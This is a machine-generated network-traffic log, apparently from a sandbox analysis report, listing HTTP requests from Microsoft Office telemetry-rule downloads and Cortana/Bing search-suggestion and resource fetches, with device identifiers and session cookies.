Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ke&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=765b10655e7e40cbb2ceb3b8d696ff0e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=key&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=e536722ae7aa4c4fabfce29204700ecd HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
Source: global traffic HTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /th?id=OSK.a04da912a9e31e0f7522ec6a00831bb3&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C9kKmwSoBasLkwr9CfsHYGBgYA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B6wDRpgDjQJgYLYD&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-cK4ArtCuAK0QvgCtcL4ArgCuAK4gvgCukL4ArvC-AK9QvgCvsL4Ar_CuAKhQvgCvkK4ArgCsgL4AqUC-AKmgvgCo4L4ArgCqoLrQvgCuAKxQuzC-AKuQu8C-AKpwzgCoEM4AriDA&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=Cc8M4ArgCuAK4ArgCuAK4ArgCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rb/6h/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AeAK&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rp/3T8ucjQMb8BBehsODJAOjeNJF6s.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /rp/9-pklorc79LFfCciVrUdpdbYMSU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
